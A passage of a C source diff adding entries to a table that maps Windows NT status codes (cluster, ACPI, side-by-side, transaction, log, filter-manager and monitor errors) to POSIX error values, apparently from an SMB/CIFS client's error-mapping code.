++	"STATUS_CLUSTER_NETINTERFACE_NOT_FOUND"},
++	{STATUS_CLUSTER_INVALID_REQUEST, -EIO,
++	"STATUS_CLUSTER_INVALID_REQUEST"},
++	{STATUS_CLUSTER_INVALID_NETWORK_PROVIDER, -EIO,
++	"STATUS_CLUSTER_INVALID_NETWORK_PROVIDER"},
++	{STATUS_CLUSTER_NODE_DOWN, -EIO, "STATUS_CLUSTER_NODE_DOWN"},
++	{STATUS_CLUSTER_NODE_UNREACHABLE, -EIO,
++	"STATUS_CLUSTER_NODE_UNREACHABLE"},
++	{STATUS_CLUSTER_NODE_NOT_MEMBER, -EIO,
++	"STATUS_CLUSTER_NODE_NOT_MEMBER"},
++	{STATUS_CLUSTER_JOIN_NOT_IN_PROGRESS, -EIO,
++	"STATUS_CLUSTER_JOIN_NOT_IN_PROGRESS"},
++	{STATUS_CLUSTER_INVALID_NETWORK, -EIO,
++	"STATUS_CLUSTER_INVALID_NETWORK"},
++	{STATUS_CLUSTER_NO_NET_ADAPTERS, -EIO,
++	"STATUS_CLUSTER_NO_NET_ADAPTERS"},
++	{STATUS_CLUSTER_NODE_UP, -EIO, "STATUS_CLUSTER_NODE_UP"},
++	{STATUS_CLUSTER_NODE_PAUSED, -EIO, "STATUS_CLUSTER_NODE_PAUSED"},
++	{STATUS_CLUSTER_NODE_NOT_PAUSED, -EIO,
++	"STATUS_CLUSTER_NODE_NOT_PAUSED"},
++	{STATUS_CLUSTER_NO_SECURITY_CONTEXT, -EIO,
++	"STATUS_CLUSTER_NO_SECURITY_CONTEXT"},
++	{STATUS_CLUSTER_NETWORK_NOT_INTERNAL, -EIO,
++	"STATUS_CLUSTER_NETWORK_NOT_INTERNAL"},
++	{STATUS_CLUSTER_POISONED, -EIO, "STATUS_CLUSTER_POISONED"},
++	{STATUS_ACPI_INVALID_OPCODE, -EIO, "STATUS_ACPI_INVALID_OPCODE"},
++	{STATUS_ACPI_STACK_OVERFLOW, -EIO, "STATUS_ACPI_STACK_OVERFLOW"},
++	{STATUS_ACPI_ASSERT_FAILED, -EIO, "STATUS_ACPI_ASSERT_FAILED"},
++	{STATUS_ACPI_INVALID_INDEX, -EIO, "STATUS_ACPI_INVALID_INDEX"},
++	{STATUS_ACPI_INVALID_ARGUMENT, -EIO, "STATUS_ACPI_INVALID_ARGUMENT"},
++	{STATUS_ACPI_FATAL, -EIO, "STATUS_ACPI_FATAL"},
++	{STATUS_ACPI_INVALID_SUPERNAME, -EIO, "STATUS_ACPI_INVALID_SUPERNAME"},
++	{STATUS_ACPI_INVALID_ARGTYPE, -EIO, "STATUS_ACPI_INVALID_ARGTYPE"},
++	{STATUS_ACPI_INVALID_OBJTYPE, -EIO, "STATUS_ACPI_INVALID_OBJTYPE"},
++	{STATUS_ACPI_INVALID_TARGETTYPE, -EIO,
++	"STATUS_ACPI_INVALID_TARGETTYPE"},
++	{STATUS_ACPI_INCORRECT_ARGUMENT_COUNT, -EIO,
++	"STATUS_ACPI_INCORRECT_ARGUMENT_COUNT"},
++	{STATUS_ACPI_ADDRESS_NOT_MAPPED, -EIO,
++	"STATUS_ACPI_ADDRESS_NOT_MAPPED"},
++	{STATUS_ACPI_INVALID_EVENTTYPE, -EIO, "STATUS_ACPI_INVALID_EVENTTYPE"},
++	{STATUS_ACPI_HANDLER_COLLISION, -EIO, "STATUS_ACPI_HANDLER_COLLISION"},
++	{STATUS_ACPI_INVALID_DATA, -EIO, "STATUS_ACPI_INVALID_DATA"},
++	{STATUS_ACPI_INVALID_REGION, -EIO, "STATUS_ACPI_INVALID_REGION"},
++	{STATUS_ACPI_INVALID_ACCESS_SIZE, -EIO,
++	"STATUS_ACPI_INVALID_ACCESS_SIZE"},
++	{STATUS_ACPI_ACQUIRE_GLOBAL_LOCK, -EIO,
++	"STATUS_ACPI_ACQUIRE_GLOBAL_LOCK"},
++	{STATUS_ACPI_ALREADY_INITIALIZED, -EIO,
++	"STATUS_ACPI_ALREADY_INITIALIZED"},
++	{STATUS_ACPI_NOT_INITIALIZED, -EIO, "STATUS_ACPI_NOT_INITIALIZED"},
++	{STATUS_ACPI_INVALID_MUTEX_LEVEL, -EIO,
++	"STATUS_ACPI_INVALID_MUTEX_LEVEL"},
++	{STATUS_ACPI_MUTEX_NOT_OWNED, -EIO, "STATUS_ACPI_MUTEX_NOT_OWNED"},
++	{STATUS_ACPI_MUTEX_NOT_OWNER, -EIO, "STATUS_ACPI_MUTEX_NOT_OWNER"},
++	{STATUS_ACPI_RS_ACCESS, -EIO, "STATUS_ACPI_RS_ACCESS"},
++	{STATUS_ACPI_INVALID_TABLE, -EIO, "STATUS_ACPI_INVALID_TABLE"},
++	{STATUS_ACPI_REG_HANDLER_FAILED, -EIO,
++	"STATUS_ACPI_REG_HANDLER_FAILED"},
++	{STATUS_ACPI_POWER_REQUEST_FAILED, -EIO,
++	"STATUS_ACPI_POWER_REQUEST_FAILED"},
++	{STATUS_SXS_SECTION_NOT_FOUND, -EIO, "STATUS_SXS_SECTION_NOT_FOUND"},
++	{STATUS_SXS_CANT_GEN_ACTCTX, -EIO, "STATUS_SXS_CANT_GEN_ACTCTX"},
++	{STATUS_SXS_INVALID_ACTCTXDATA_FORMAT, -EIO,
++	"STATUS_SXS_INVALID_ACTCTXDATA_FORMAT"},
++	{STATUS_SXS_ASSEMBLY_NOT_FOUND, -EIO, "STATUS_SXS_ASSEMBLY_NOT_FOUND"},
++	{STATUS_SXS_MANIFEST_FORMAT_ERROR, -EIO,
++	"STATUS_SXS_MANIFEST_FORMAT_ERROR"},
++	{STATUS_SXS_MANIFEST_PARSE_ERROR, -EIO,
++	"STATUS_SXS_MANIFEST_PARSE_ERROR"},
++	{STATUS_SXS_ACTIVATION_CONTEXT_DISABLED, -EIO,
++	"STATUS_SXS_ACTIVATION_CONTEXT_DISABLED"},
++	{STATUS_SXS_KEY_NOT_FOUND, -EIO, "STATUS_SXS_KEY_NOT_FOUND"},
++	{STATUS_SXS_VERSION_CONFLICT, -EIO, "STATUS_SXS_VERSION_CONFLICT"},
++	{STATUS_SXS_WRONG_SECTION_TYPE, -EIO, "STATUS_SXS_WRONG_SECTION_TYPE"},
++	{STATUS_SXS_THREAD_QUERIES_DISABLED, -EIO,
++	"STATUS_SXS_THREAD_QUERIES_DISABLED"},
++	{STATUS_SXS_ASSEMBLY_MISSING, -EIO, "STATUS_SXS_ASSEMBLY_MISSING"},
++	{STATUS_SXS_PROCESS_DEFAULT_ALREADY_SET, -EIO,
++	"STATUS_SXS_PROCESS_DEFAULT_ALREADY_SET"},
++	{STATUS_SXS_EARLY_DEACTIVATION, -EIO, "STATUS_SXS_EARLY_DEACTIVATION"},
++	{STATUS_SXS_INVALID_DEACTIVATION, -EIO,
++	"STATUS_SXS_INVALID_DEACTIVATION"},
++	{STATUS_SXS_MULTIPLE_DEACTIVATION, -EIO,
++	"STATUS_SXS_MULTIPLE_DEACTIVATION"},
++	{STATUS_SXS_SYSTEM_DEFAULT_ACTIVATION_CONTEXT_EMPTY, -EIO,
++	"STATUS_SXS_SYSTEM_DEFAULT_ACTIVATION_CONTEXT_EMPTY"},
++	{STATUS_SXS_PROCESS_TERMINATION_REQUESTED, -EIO,
++	"STATUS_SXS_PROCESS_TERMINATION_REQUESTED"},
++	{STATUS_SXS_CORRUPT_ACTIVATION_STACK, -EIO,
++	"STATUS_SXS_CORRUPT_ACTIVATION_STACK"},
++	{STATUS_SXS_CORRUPTION, -EIO, "STATUS_SXS_CORRUPTION"},
++	{STATUS_SXS_INVALID_IDENTITY_ATTRIBUTE_VALUE, -EIO,
++	"STATUS_SXS_INVALID_IDENTITY_ATTRIBUTE_VALUE"},
++	{STATUS_SXS_INVALID_IDENTITY_ATTRIBUTE_NAME, -EIO,
++	"STATUS_SXS_INVALID_IDENTITY_ATTRIBUTE_NAME"},
++	{STATUS_SXS_IDENTITY_DUPLICATE_ATTRIBUTE, -EIO,
++	"STATUS_SXS_IDENTITY_DUPLICATE_ATTRIBUTE"},
++	{STATUS_SXS_IDENTITY_PARSE_ERROR, -EIO,
++	"STATUS_SXS_IDENTITY_PARSE_ERROR"},
++	{STATUS_SXS_COMPONENT_STORE_CORRUPT, -EIO,
++	"STATUS_SXS_COMPONENT_STORE_CORRUPT"},
++	{STATUS_SXS_FILE_HASH_MISMATCH, -EIO, "STATUS_SXS_FILE_HASH_MISMATCH"},
++	{STATUS_SXS_MANIFEST_IDENTITY_SAME_BUT_CONTENTS_DIFFERENT, -EIO,
++	"STATUS_SXS_MANIFEST_IDENTITY_SAME_BUT_CONTENTS_DIFFERENT"},
++	{STATUS_SXS_IDENTITIES_DIFFERENT, -EIO,
++	"STATUS_SXS_IDENTITIES_DIFFERENT"},
++	{STATUS_SXS_ASSEMBLY_IS_NOT_A_DEPLOYMENT, -EIO,
++	"STATUS_SXS_ASSEMBLY_IS_NOT_A_DEPLOYMENT"},
++	{STATUS_SXS_FILE_NOT_PART_OF_ASSEMBLY, -EIO,
++	"STATUS_SXS_FILE_NOT_PART_OF_ASSEMBLY"},
++	{STATUS_ADVANCED_INSTALLER_FAILED, -EIO,
++	"STATUS_ADVANCED_INSTALLER_FAILED"},
++	{STATUS_XML_ENCODING_MISMATCH, -EIO, "STATUS_XML_ENCODING_MISMATCH"},
++	{STATUS_SXS_MANIFEST_TOO_BIG, -EIO, "STATUS_SXS_MANIFEST_TOO_BIG"},
++	{STATUS_SXS_SETTING_NOT_REGISTERED, -EIO,
++	"STATUS_SXS_SETTING_NOT_REGISTERED"},
++	{STATUS_SXS_TRANSACTION_CLOSURE_INCOMPLETE, -EIO,
++	"STATUS_SXS_TRANSACTION_CLOSURE_INCOMPLETE"},
++	{STATUS_SMI_PRIMITIVE_INSTALLER_FAILED, -EIO,
++	"STATUS_SMI_PRIMITIVE_INSTALLER_FAILED"},
++	{STATUS_GENERIC_COMMAND_FAILED, -EIO, "STATUS_GENERIC_COMMAND_FAILED"},
++	{STATUS_SXS_FILE_HASH_MISSING, -EIO, "STATUS_SXS_FILE_HASH_MISSING"},
++	{STATUS_TRANSACTIONAL_CONFLICT, -EIO, "STATUS_TRANSACTIONAL_CONFLICT"},
++	{STATUS_INVALID_TRANSACTION, -EIO, "STATUS_INVALID_TRANSACTION"},
++	{STATUS_TRANSACTION_NOT_ACTIVE, -EIO, "STATUS_TRANSACTION_NOT_ACTIVE"},
++	{STATUS_TM_INITIALIZATION_FAILED, -EIO,
++	"STATUS_TM_INITIALIZATION_FAILED"},
++	{STATUS_RM_NOT_ACTIVE, -EIO, "STATUS_RM_NOT_ACTIVE"},
++	{STATUS_RM_METADATA_CORRUPT, -EIO, "STATUS_RM_METADATA_CORRUPT"},
++	{STATUS_TRANSACTION_NOT_JOINED, -EIO, "STATUS_TRANSACTION_NOT_JOINED"},
++	{STATUS_DIRECTORY_NOT_RM, -EIO, "STATUS_DIRECTORY_NOT_RM"},
++	{STATUS_TRANSACTIONS_UNSUPPORTED_REMOTE, -EIO,
++	"STATUS_TRANSACTIONS_UNSUPPORTED_REMOTE"},
++	{STATUS_LOG_RESIZE_INVALID_SIZE, -EIO,
++	"STATUS_LOG_RESIZE_INVALID_SIZE"},
++	{STATUS_REMOTE_FILE_VERSION_MISMATCH, -EIO,
++	"STATUS_REMOTE_FILE_VERSION_MISMATCH"},
++	{STATUS_CRM_PROTOCOL_ALREADY_EXISTS, -EIO,
++	"STATUS_CRM_PROTOCOL_ALREADY_EXISTS"},
++	{STATUS_TRANSACTION_PROPAGATION_FAILED, -EIO,
++	"STATUS_TRANSACTION_PROPAGATION_FAILED"},
++	{STATUS_CRM_PROTOCOL_NOT_FOUND, -EIO, "STATUS_CRM_PROTOCOL_NOT_FOUND"},
++	{STATUS_TRANSACTION_SUPERIOR_EXISTS, -EIO,
++	"STATUS_TRANSACTION_SUPERIOR_EXISTS"},
++	{STATUS_TRANSACTION_REQUEST_NOT_VALID, -EIO,
++	"STATUS_TRANSACTION_REQUEST_NOT_VALID"},
++	{STATUS_TRANSACTION_NOT_REQUESTED, -EIO,
++	"STATUS_TRANSACTION_NOT_REQUESTED"},
++	{STATUS_TRANSACTION_ALREADY_ABORTED, -EIO,
++	"STATUS_TRANSACTION_ALREADY_ABORTED"},
++	{STATUS_TRANSACTION_ALREADY_COMMITTED, -EIO,
++	"STATUS_TRANSACTION_ALREADY_COMMITTED"},
++	{STATUS_TRANSACTION_INVALID_MARSHALL_BUFFER, -EIO,
++	"STATUS_TRANSACTION_INVALID_MARSHALL_BUFFER"},
++	{STATUS_CURRENT_TRANSACTION_NOT_VALID, -EIO,
++	"STATUS_CURRENT_TRANSACTION_NOT_VALID"},
++	{STATUS_LOG_GROWTH_FAILED, -EIO, "STATUS_LOG_GROWTH_FAILED"},
++	{STATUS_OBJECT_NO_LONGER_EXISTS, -EIO,
++	"STATUS_OBJECT_NO_LONGER_EXISTS"},
++	{STATUS_STREAM_MINIVERSION_NOT_FOUND, -EIO,
++	"STATUS_STREAM_MINIVERSION_NOT_FOUND"},
++	{STATUS_STREAM_MINIVERSION_NOT_VALID, -EIO,
++	"STATUS_STREAM_MINIVERSION_NOT_VALID"},
++	{STATUS_MINIVERSION_INACCESSIBLE_FROM_SPECIFIED_TRANSACTION, -EIO,
++	"STATUS_MINIVERSION_INACCESSIBLE_FROM_SPECIFIED_TRANSACTION"},
++	{STATUS_CANT_OPEN_MINIVERSION_WITH_MODIFY_INTENT, -EIO,
++	"STATUS_CANT_OPEN_MINIVERSION_WITH_MODIFY_INTENT"},
++	{STATUS_CANT_CREATE_MORE_STREAM_MINIVERSIONS, -EIO,
++	"STATUS_CANT_CREATE_MORE_STREAM_MINIVERSIONS"},
++	{STATUS_HANDLE_NO_LONGER_VALID, -EIO, "STATUS_HANDLE_NO_LONGER_VALID"},
++	{STATUS_LOG_CORRUPTION_DETECTED, -EIO,
++	"STATUS_LOG_CORRUPTION_DETECTED"},
++	{STATUS_RM_DISCONNECTED, -EIO, "STATUS_RM_DISCONNECTED"},
++	{STATUS_ENLISTMENT_NOT_SUPERIOR, -EIO,
++	"STATUS_ENLISTMENT_NOT_SUPERIOR"},
++	{STATUS_FILE_IDENTITY_NOT_PERSISTENT, -EIO,
++	"STATUS_FILE_IDENTITY_NOT_PERSISTENT"},
++	{STATUS_CANT_BREAK_TRANSACTIONAL_DEPENDENCY, -EIO,
++	"STATUS_CANT_BREAK_TRANSACTIONAL_DEPENDENCY"},
++	{STATUS_CANT_CROSS_RM_BOUNDARY, -EIO, "STATUS_CANT_CROSS_RM_BOUNDARY"},
++	{STATUS_TXF_DIR_NOT_EMPTY, -EIO, "STATUS_TXF_DIR_NOT_EMPTY"},
++	{STATUS_INDOUBT_TRANSACTIONS_EXIST, -EIO,
++	"STATUS_INDOUBT_TRANSACTIONS_EXIST"},
++	{STATUS_TM_VOLATILE, -EIO, "STATUS_TM_VOLATILE"},
++	{STATUS_ROLLBACK_TIMER_EXPIRED, -EIO, "STATUS_ROLLBACK_TIMER_EXPIRED"},
++	{STATUS_TXF_ATTRIBUTE_CORRUPT, -EIO, "STATUS_TXF_ATTRIBUTE_CORRUPT"},
++	{STATUS_EFS_NOT_ALLOWED_IN_TRANSACTION, -EIO,
++	"STATUS_EFS_NOT_ALLOWED_IN_TRANSACTION"},
++	{STATUS_TRANSACTIONAL_OPEN_NOT_ALLOWED, -EIO,
++	"STATUS_TRANSACTIONAL_OPEN_NOT_ALLOWED"},
++	{STATUS_TRANSACTED_MAPPING_UNSUPPORTED_REMOTE, -EIO,
++	"STATUS_TRANSACTED_MAPPING_UNSUPPORTED_REMOTE"},
++	{STATUS_TRANSACTION_REQUIRED_PROMOTION, -EIO,
++	"STATUS_TRANSACTION_REQUIRED_PROMOTION"},
++	{STATUS_CANNOT_EXECUTE_FILE_IN_TRANSACTION, -EIO,
++	"STATUS_CANNOT_EXECUTE_FILE_IN_TRANSACTION"},
++	{STATUS_TRANSACTIONS_NOT_FROZEN, -EIO,
++	"STATUS_TRANSACTIONS_NOT_FROZEN"},
++	{STATUS_TRANSACTION_FREEZE_IN_PROGRESS, -EIO,
++	"STATUS_TRANSACTION_FREEZE_IN_PROGRESS"},
++	{STATUS_NOT_SNAPSHOT_VOLUME, -EIO, "STATUS_NOT_SNAPSHOT_VOLUME"},
++	{STATUS_NO_SAVEPOINT_WITH_OPEN_FILES, -EIO,
++	"STATUS_NO_SAVEPOINT_WITH_OPEN_FILES"},
++	{STATUS_SPARSE_NOT_ALLOWED_IN_TRANSACTION, -EIO,
++	"STATUS_SPARSE_NOT_ALLOWED_IN_TRANSACTION"},
++	{STATUS_TM_IDENTITY_MISMATCH, -EIO, "STATUS_TM_IDENTITY_MISMATCH"},
++	{STATUS_FLOATED_SECTION, -EIO, "STATUS_FLOATED_SECTION"},
++	{STATUS_CANNOT_ACCEPT_TRANSACTED_WORK, -EIO,
++	"STATUS_CANNOT_ACCEPT_TRANSACTED_WORK"},
++	{STATUS_CANNOT_ABORT_TRANSACTIONS, -EIO,
++	"STATUS_CANNOT_ABORT_TRANSACTIONS"},
++	{STATUS_TRANSACTION_NOT_FOUND, -EIO, "STATUS_TRANSACTION_NOT_FOUND"},
++	{STATUS_RESOURCEMANAGER_NOT_FOUND, -EIO,
++	"STATUS_RESOURCEMANAGER_NOT_FOUND"},
++	{STATUS_ENLISTMENT_NOT_FOUND, -EIO, "STATUS_ENLISTMENT_NOT_FOUND"},
++	{STATUS_TRANSACTIONMANAGER_NOT_FOUND, -EIO,
++	"STATUS_TRANSACTIONMANAGER_NOT_FOUND"},
++	{STATUS_TRANSACTIONMANAGER_NOT_ONLINE, -EIO,
++	"STATUS_TRANSACTIONMANAGER_NOT_ONLINE"},
++	{STATUS_TRANSACTIONMANAGER_RECOVERY_NAME_COLLISION, -EIO,
++	"STATUS_TRANSACTIONMANAGER_RECOVERY_NAME_COLLISION"},
++	{STATUS_TRANSACTION_NOT_ROOT, -EIO, "STATUS_TRANSACTION_NOT_ROOT"},
++	{STATUS_TRANSACTION_OBJECT_EXPIRED, -EIO,
++	"STATUS_TRANSACTION_OBJECT_EXPIRED"},
++	{STATUS_COMPRESSION_NOT_ALLOWED_IN_TRANSACTION, -EIO,
++	"STATUS_COMPRESSION_NOT_ALLOWED_IN_TRANSACTION"},
++	{STATUS_TRANSACTION_RESPONSE_NOT_ENLISTED, -EIO,
++	"STATUS_TRANSACTION_RESPONSE_NOT_ENLISTED"},
++	{STATUS_TRANSACTION_RECORD_TOO_LONG, -EIO,
++	"STATUS_TRANSACTION_RECORD_TOO_LONG"},
++	{STATUS_NO_LINK_TRACKING_IN_TRANSACTION, -EIO,
++	"STATUS_NO_LINK_TRACKING_IN_TRANSACTION"},
++	{STATUS_OPERATION_NOT_SUPPORTED_IN_TRANSACTION, -EOPNOTSUPP,
++	"STATUS_OPERATION_NOT_SUPPORTED_IN_TRANSACTION"},
++	{STATUS_TRANSACTION_INTEGRITY_VIOLATED, -EIO,
++	"STATUS_TRANSACTION_INTEGRITY_VIOLATED"},
++	{STATUS_LOG_SECTOR_INVALID, -EIO, "STATUS_LOG_SECTOR_INVALID"},
++	{STATUS_LOG_SECTOR_PARITY_INVALID, -EIO,
++	"STATUS_LOG_SECTOR_PARITY_INVALID"},
++	{STATUS_LOG_SECTOR_REMAPPED, -EIO, "STATUS_LOG_SECTOR_REMAPPED"},
++	{STATUS_LOG_BLOCK_INCOMPLETE, -EIO, "STATUS_LOG_BLOCK_INCOMPLETE"},
++	{STATUS_LOG_INVALID_RANGE, -EIO, "STATUS_LOG_INVALID_RANGE"},
++	{STATUS_LOG_BLOCKS_EXHAUSTED, -EIO, "STATUS_LOG_BLOCKS_EXHAUSTED"},
++	{STATUS_LOG_READ_CONTEXT_INVALID, -EIO,
++	"STATUS_LOG_READ_CONTEXT_INVALID"},
++	{STATUS_LOG_RESTART_INVALID, -EIO, "STATUS_LOG_RESTART_INVALID"},
++	{STATUS_LOG_BLOCK_VERSION, -EIO, "STATUS_LOG_BLOCK_VERSION"},
++	{STATUS_LOG_BLOCK_INVALID, -EIO, "STATUS_LOG_BLOCK_INVALID"},
++	{STATUS_LOG_READ_MODE_INVALID, -EIO, "STATUS_LOG_READ_MODE_INVALID"},
++	{STATUS_LOG_METADATA_CORRUPT, -EIO, "STATUS_LOG_METADATA_CORRUPT"},
++	{STATUS_LOG_METADATA_INVALID, -EIO, "STATUS_LOG_METADATA_INVALID"},
++	{STATUS_LOG_METADATA_INCONSISTENT, -EIO,
++	"STATUS_LOG_METADATA_INCONSISTENT"},
++	{STATUS_LOG_RESERVATION_INVALID, -EIO,
++	"STATUS_LOG_RESERVATION_INVALID"},
++	{STATUS_LOG_CANT_DELETE, -EIO, "STATUS_LOG_CANT_DELETE"},
++	{STATUS_LOG_CONTAINER_LIMIT_EXCEEDED, -EIO,
++	"STATUS_LOG_CONTAINER_LIMIT_EXCEEDED"},
++	{STATUS_LOG_START_OF_LOG, -EIO, "STATUS_LOG_START_OF_LOG"},
++	{STATUS_LOG_POLICY_ALREADY_INSTALLED, -EIO,
++	"STATUS_LOG_POLICY_ALREADY_INSTALLED"},
++	{STATUS_LOG_POLICY_NOT_INSTALLED, -EIO,
++	"STATUS_LOG_POLICY_NOT_INSTALLED"},
++	{STATUS_LOG_POLICY_INVALID, -EIO, "STATUS_LOG_POLICY_INVALID"},
++	{STATUS_LOG_POLICY_CONFLICT, -EIO, "STATUS_LOG_POLICY_CONFLICT"},
++	{STATUS_LOG_PINNED_ARCHIVE_TAIL, -EIO,
++	"STATUS_LOG_PINNED_ARCHIVE_TAIL"},
++	{STATUS_LOG_RECORD_NONEXISTENT, -EIO, "STATUS_LOG_RECORD_NONEXISTENT"},
++	{STATUS_LOG_RECORDS_RESERVED_INVALID, -EIO,
++	"STATUS_LOG_RECORDS_RESERVED_INVALID"},
++	{STATUS_LOG_SPACE_RESERVED_INVALID, -EIO,
++	"STATUS_LOG_SPACE_RESERVED_INVALID"},
++	{STATUS_LOG_TAIL_INVALID, -EIO, "STATUS_LOG_TAIL_INVALID"},
++	{STATUS_LOG_FULL, -EIO, "STATUS_LOG_FULL"},
++	{STATUS_LOG_MULTIPLEXED, -EIO, "STATUS_LOG_MULTIPLEXED"},
++	{STATUS_LOG_DEDICATED, -EIO, "STATUS_LOG_DEDICATED"},
++	{STATUS_LOG_ARCHIVE_NOT_IN_PROGRESS, -EIO,
++	"STATUS_LOG_ARCHIVE_NOT_IN_PROGRESS"},
++	{STATUS_LOG_ARCHIVE_IN_PROGRESS, -EIO,
++	"STATUS_LOG_ARCHIVE_IN_PROGRESS"},
++	{STATUS_LOG_EPHEMERAL, -EIO, "STATUS_LOG_EPHEMERAL"},
++	{STATUS_LOG_NOT_ENOUGH_CONTAINERS, -EIO,
++	"STATUS_LOG_NOT_ENOUGH_CONTAINERS"},
++	{STATUS_LOG_CLIENT_ALREADY_REGISTERED, -EIO,
++	"STATUS_LOG_CLIENT_ALREADY_REGISTERED"},
++	{STATUS_LOG_CLIENT_NOT_REGISTERED, -EIO,
++	"STATUS_LOG_CLIENT_NOT_REGISTERED"},
++	{STATUS_LOG_FULL_HANDLER_IN_PROGRESS, -EIO,
++	"STATUS_LOG_FULL_HANDLER_IN_PROGRESS"},
++	{STATUS_LOG_CONTAINER_READ_FAILED, -EIO,
++	"STATUS_LOG_CONTAINER_READ_FAILED"},
++	{STATUS_LOG_CONTAINER_WRITE_FAILED, -EIO,
++	"STATUS_LOG_CONTAINER_WRITE_FAILED"},
++	{STATUS_LOG_CONTAINER_OPEN_FAILED, -EIO,
++	"STATUS_LOG_CONTAINER_OPEN_FAILED"},
++	{STATUS_LOG_CONTAINER_STATE_INVALID, -EIO,
++	"STATUS_LOG_CONTAINER_STATE_INVALID"},
++	{STATUS_LOG_STATE_INVALID, -EIO, "STATUS_LOG_STATE_INVALID"},
++	{STATUS_LOG_PINNED, -EIO, "STATUS_LOG_PINNED"},
++	{STATUS_LOG_METADATA_FLUSH_FAILED, -EIO,
++	"STATUS_LOG_METADATA_FLUSH_FAILED"},
++	{STATUS_LOG_INCONSISTENT_SECURITY, -EIO,
++	"STATUS_LOG_INCONSISTENT_SECURITY"},
++	{STATUS_LOG_APPENDED_FLUSH_FAILED, -EIO,
++	"STATUS_LOG_APPENDED_FLUSH_FAILED"},
++	{STATUS_LOG_PINNED_RESERVATION, -EIO, "STATUS_LOG_PINNED_RESERVATION"},
++	{STATUS_VIDEO_HUNG_DISPLAY_DRIVER_THREAD, -EIO,
++	"STATUS_VIDEO_HUNG_DISPLAY_DRIVER_THREAD"},
++	{STATUS_FLT_NO_HANDLER_DEFINED, -EIO, "STATUS_FLT_NO_HANDLER_DEFINED"},
++	{STATUS_FLT_CONTEXT_ALREADY_DEFINED, -EIO,
++	"STATUS_FLT_CONTEXT_ALREADY_DEFINED"},
++	{STATUS_FLT_INVALID_ASYNCHRONOUS_REQUEST, -EIO,
++	"STATUS_FLT_INVALID_ASYNCHRONOUS_REQUEST"},
++	{STATUS_FLT_DISALLOW_FAST_IO, -EIO, "STATUS_FLT_DISALLOW_FAST_IO"},
++	{STATUS_FLT_INVALID_NAME_REQUEST, -EIO,
++	"STATUS_FLT_INVALID_NAME_REQUEST"},
++	{STATUS_FLT_NOT_SAFE_TO_POST_OPERATION, -EIO,
++	"STATUS_FLT_NOT_SAFE_TO_POST_OPERATION"},
++	{STATUS_FLT_NOT_INITIALIZED, -EIO, "STATUS_FLT_NOT_INITIALIZED"},
++	{STATUS_FLT_FILTER_NOT_READY, -EIO, "STATUS_FLT_FILTER_NOT_READY"},
++	{STATUS_FLT_POST_OPERATION_CLEANUP, -EIO,
++	"STATUS_FLT_POST_OPERATION_CLEANUP"},
++	{STATUS_FLT_INTERNAL_ERROR, -EIO, "STATUS_FLT_INTERNAL_ERROR"},
++	{STATUS_FLT_DELETING_OBJECT, -EIO, "STATUS_FLT_DELETING_OBJECT"},
++	{STATUS_FLT_MUST_BE_NONPAGED_POOL, -EIO,
++	"STATUS_FLT_MUST_BE_NONPAGED_POOL"},
++	{STATUS_FLT_DUPLICATE_ENTRY, -EIO, "STATUS_FLT_DUPLICATE_ENTRY"},
++	{STATUS_FLT_CBDQ_DISABLED, -EIO, "STATUS_FLT_CBDQ_DISABLED"},
++	{STATUS_FLT_DO_NOT_ATTACH, -EIO, "STATUS_FLT_DO_NOT_ATTACH"},
++	{STATUS_FLT_DO_NOT_DETACH, -EIO, "STATUS_FLT_DO_NOT_DETACH"},
++	{STATUS_FLT_INSTANCE_ALTITUDE_COLLISION, -EIO,
++	"STATUS_FLT_INSTANCE_ALTITUDE_COLLISION"},
++	{STATUS_FLT_INSTANCE_NAME_COLLISION, -EIO,
++	"STATUS_FLT_INSTANCE_NAME_COLLISION"},
++	{STATUS_FLT_FILTER_NOT_FOUND, -EIO, "STATUS_FLT_FILTER_NOT_FOUND"},
++	{STATUS_FLT_VOLUME_NOT_FOUND, -EIO, "STATUS_FLT_VOLUME_NOT_FOUND"},
++	{STATUS_FLT_INSTANCE_NOT_FOUND, -EIO, "STATUS_FLT_INSTANCE_NOT_FOUND"},
++	{STATUS_FLT_CONTEXT_ALLOCATION_NOT_FOUND, -EIO,
++	"STATUS_FLT_CONTEXT_ALLOCATION_NOT_FOUND"},
++	{STATUS_FLT_INVALID_CONTEXT_REGISTRATION, -EIO,
++	"STATUS_FLT_INVALID_CONTEXT_REGISTRATION"},
++	{STATUS_FLT_NAME_CACHE_MISS, -EIO, "STATUS_FLT_NAME_CACHE_MISS"},
++	{STATUS_FLT_NO_DEVICE_OBJECT, -EIO, "STATUS_FLT_NO_DEVICE_OBJECT"},
++	{STATUS_FLT_VOLUME_ALREADY_MOUNTED, -EIO,
++	"STATUS_FLT_VOLUME_ALREADY_MOUNTED"},
++	{STATUS_FLT_ALREADY_ENLISTED, -EIO, "STATUS_FLT_ALREADY_ENLISTED"},
++	{STATUS_FLT_CONTEXT_ALREADY_LINKED, -EIO,
++	"STATUS_FLT_CONTEXT_ALREADY_LINKED"},
++	{STATUS_FLT_NO_WAITER_FOR_REPLY, -EIO,
++	"STATUS_FLT_NO_WAITER_FOR_REPLY"},
++	{STATUS_MONITOR_NO_DESCRIPTOR, -EIO, "STATUS_MONITOR_NO_DESCRIPTOR"},
++	{STATUS_MONITOR_UNKNOWN_DESCRIPTOR_FORMAT, -EIO,
++	"STATUS_MONITOR_UNKNOWN_DESCRIPTOR_FORMAT"},
++	{STATUS_MONITOR_INVALID_DESCRIPTOR_CHECKSUM, -EIO,
++	"STATUS_MONITOR_INVALID_DESCRIPTOR_CHECKSUM"},
++	{STATUS_MONITOR_INVALID_STANDARD_TIMING_BLOCK, -EIO,
++	"STATUS_MONITOR_INVALID_STANDARD_TIMING_BLOCK"},
++	{STATUS_MONITOR_WMI_DATABLOCK_REGISTRATION_FAILED, -EIO,
++	"STATUS_MONITOR_WMI_DATABLOCK_REGISTRATION_FAILED"},
++	{STATUS_MONITOR_INVALID_SERIAL_NUMBER_MONDSC_BLOCK, -EIO,
++	"STATUS_MONITOR_INVALID_SERIAL_NUMBER_MONDSC_BLOCK"},
++	{STATUS_MONITOR_INVALID_USER_FRIENDLY_MONDSC_BLOCK, -EIO,
++	"STATUS_MONITOR_INVALID_USER_FRIENDLY_MONDSC_BLOCK"},
++	{STATUS_MONITOR_NO_MORE_DESCRIPTOR_DATA, -EIO,
++	"STATUS_MONITOR_NO_MORE_DESCRIPTOR_DATA"},
++	{STATUS_MONITOR_INVALID_DETAILED_TIMING_BLOCK, -EIO,
++	"STATUS_MONITOR_INVALID_DETAILED_TIMING_BLOCK"},
++	{STATUS_GRAPHICS_NOT_EXCLUSIVE_MODE_OWNER, -EIO,
++	"STATUS_GRAPHICS_NOT_EXCLUSIVE_MODE_OWNER"},
